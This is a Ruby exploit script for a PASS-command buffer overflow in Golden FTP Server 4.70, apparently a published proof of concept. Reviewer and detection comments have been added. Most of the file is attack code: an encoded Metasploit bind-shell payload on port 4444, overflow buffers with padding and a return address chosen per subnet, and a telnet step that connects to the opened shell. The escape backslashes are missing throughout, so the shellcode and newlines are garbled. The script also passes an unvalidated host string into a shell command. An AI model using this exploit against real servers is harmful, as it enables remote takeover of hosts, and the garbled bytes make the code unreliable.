# Title : Golden FTP Server v4.70 PASS Command Buffer Overflow Exploit
# Published : 2011-01-23
# Author : cd1zz and iglesiasgg
#GoldenFTP 4.70 PASS Exploit
#Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
#Tested on XP SP3
#Vendor Contacted: 1/17/2011 (no response)
#For this exploit to work correctly, you need to know the subnet that the server
#is running on. You also need to make sure that "show new connections" is checked in the options.
#The total length of the buffer should be 4 bytes less than the offset, with EIP at the end.
#528 is the offset when server running on 192.168.236.0
#533 is the offset when server running on 10.0.1.0
#530 is the offset when server running on 192.168.1.0
#531 is the offset when server running on 172.16.1.0
require 'net/ftp'
#Metasploit bind shell port=4444 | shikata_ga_nai | 369 bytes
# Opaque payload blob. Per the header comment it is a Metasploit-generated
# bind shell (369 bytes, shikata_ga_nai encoded) that listens on TCP/4444 on
# the FTP host once triggered. Nothing below inspects it; it is only
# concatenated into the PASS argument.
# Size bookkeeping: 26 lines x 14 pairs + 5 pairs = 369, so the "369 bytes"
# figure and the 529/527/526/524 totals annotated further down assume one
# byte per "xNN" pair.
# NOTE(review): as rendered here the pairs carry no backslash, so the Ruby
# literal is plain ASCII text rather than one byte per pair — this looks like
# a rendering/extraction artifact of the page, which cannot be confirmed from
# the page itself.
# Detection note: because the bytes come from an encoder, signatures on this
# blob are brittle; the overlong PASS argument (see the login call below) and
# a new listener on TCP/4444 on the FTP host are the stable indicators.
shellcode = ("x2bxc9xb1x56xbax96x70x11x9exdbxd0xd9x74x24" +
"xf4x58x31x50x10x03x50x10x83xe8xfcx74x85xed" +
"x76xf1x66x0ex87x61xeexebxb6xb3x94x78xeax03" +
"xdex2dx07xe8xb2xc5x9cx9cx1axe9x15x2ax7dxc4" +
"xa6x9bx41x8ax65xbax3dxd1xb9x1cx7fx1axccx5d" +
"xb8x47x3fx0fx11x03x92xbfx16x51x2fxbexf8xdd" +
"x0fxb8x7dx21xfbx72x7fx72x54x09x37x6axdex55" +
"xe8x8bx33x86xd4xc2x38x7cxaexd4xe8x4dx4fxe7" +
"xd4x01x6exc7xd8x58xb6xe0x02x2fxccx12xbex37" +
"x17x68x64xb2x8axcaxefx64x6fxeax3cxf2xe4xe0" +
"x89x71xa2xe4x0cx56xd8x11x84x59x0fx90xdex7d" +
"x8bxf8x85x1cx8axa4x68x21xccx01xd4x87x86xa0" +
"x01xb1xc4xacxe6x8fxf6x2cx61x98x85x1ex2ex32" +
"x02x13xa7x9cxd5x54x92x58x49xabx1dx98x43x68" +
"x49xc8xfbx59xf2x83xfbx66x27x03xacxc8x98xe3" +
"x1cxa9x48x8bx76x26xb6xabx78xecxc1xecxb6xd4" +
"x81x9axbaxeax34x06x32x0cx5cxa6x12x86xc9x04" +
"x41x1fx6dx77xa3x33x26xefxfbx5dxf0x10xfcx4b" +
"x52xbdx54x1cx21xadx60x3dx36xf8xc0x34x0ex6a" +
"x9ax28xdcx0bx9bx60xb6xa8x0exefx47xa7x32xb8" +
"x10xe0x85xb1xf5x1cxbfx6bxe8xddx59x53xa8x39" +
"x9ax5ax30xccxa6x78x22x08x26xc5x16xc4x71x93" +
"xc0xa2x2bx55xbbx7cx87x3fx2bxf9xebxffx2dx06" +
"x26x76xd1xb6x9fxcfxedx76x48xd8x96x6bxe8x27" +
"x4dx28x18x62xccx18xb1x2bx84x19xdcxcbx72x5d" +
"xd9x4fx77x1dx1ex4fxf2x18x5axd7xeex50xf3xb2" +
"x10xc7xf4x96x1b")
# --- operator input ---------------------------------------------------------
# The target address and a menu choice are read from stdin. Neither is
# validated; the host string is later spliced into a shell command string
# (see the system() call at the end of the script).
# NOTE(review): the bare "n" inside these messages reads like a lost "\n"
# escape (same rendering issue as the payload literal above); as written the
# messages print a literal n.
puts "[*]This exploit requires knowledge of the local n[*]subnet the ftp server is running on."
puts "[*]It will not work unless it is one of these: n-->10.0.1.0n-->192.168.1.0n-->172.16.1.0n-->192.168.236.0n[*]If your subnet isn't listed, figure out the offset on your own."
puts "[*]Enter the IP of the GoldenFTP Server"
host = gets.chomp   # unvalidated; reused for Net::FTP.new and for the telnet command string
#Get the subnet so we can figure out the offset
# The menu number only selects which padding length is used in the if chain
# below; the per-subnet offsets themselves are listed in the file header.
puts "Which subnet is the FTP server running on?"
puts "1 --> 10.0.1.0"
puts "2 --> 192.168.1.0"
puts "3 --> 172.16.1.0"
puts "4 --> 192.168.236.0"
subnet = gets.chomp   # anything other than "1".."4" matches no branch below, leaving buffer nil
# Pieces of the PASS argument. The totals annotated in the if chain assume
# one byte per "xNN" pair: junk (1 + 19 = 20) + payload (369) + pad + eip (4).
junk = "x01" + "x90" * 19   # leading 20 bytes of filler
eip = "x4exaex45x7e"   # the 4 bytes that sit at the very end of the buffer ("EIP at the end" per the header)
padto529 = "x90" * 136   # 20 + 369 + 136 + 4 = 529 (offset 533, subnet 10.0.1.0)
padto527 = "x90" * 134   # 20 + 369 + 134 + 4 = 527 (offset 531, subnet 172.16.1.0)
padto526 = "x90" * 133   # 20 + 369 + 133 + 4 = 526 (offset 530, subnet 192.168.1.0)
padto524 = "x90" * 131   # 20 + 369 + 131 + 4 = 524 (offset 528, subnet 192.168.236.0)
# Pick the padding so the total buffer is 4 bytes shorter than the
# per-subnet offset given in the header, with eip as the final 4 bytes.
# There is no else branch: an unrecognised menu choice leaves buffer nil,
# and that nil is handed straight to the login call below.
if subnet =="1"
buffer = junk + shellcode + padto529 + eip # buffer is 529 total bytes
elsif subnet =="2"
buffer = junk + shellcode + padto526 + eip # buffer is 526 total bytes
elsif subnet =="3"
buffer = junk + shellcode + padto527 + eip # buffer is 527 total bytes
elsif subnet =="4"
buffer = junk + shellcode + padto524 + eip # buffer is 524 total bytes
end
# --- delivery ---------------------------------------------------------------
# Net::FTP.new with a host argument connects immediately (control port 21).
# Nothing here is rescued, so a refused or timed-out connection ends the
# script with the raw exception.
ftp = Net::FTP.new(host)
puts "++ Connecting to target...n"   # printed after the connect on the line above has already happened
# user= and passwd= are ordinary local assignments evaluated in place, not
# keyword arguments: this is login("anonymous", buffer). The oversized
# buffer goes out as the PASS argument, which is the overflow trigger and
# the thing a defender can match on: an anonymous USER followed by a PASS
# argument of roughly 524-529 bytes. Restricting or disabling anonymous
# login on the server removes this path entirely.
ftp.login(user="anonymous", passwd=(buffer))
ftp.passive = true   # set after login; no data transfer follows, so presumably without effect here
sleep(2)   # fixed delay before closing; presumably to give the server-side listener time to come up
ftp.close
puts "++ Connecting to target on port 4444....n"
sleep(2)
# A bind shell means the FTP host itself is now listening on TCP/4444, so
# the second network indicator is an inbound connection to the FTP server
# on 4444 from the same source that sent the PASS. The host string is
# concatenated into the command unquoted and passed to the shell.
command= "telnet "+ host +" 4444"
system(command)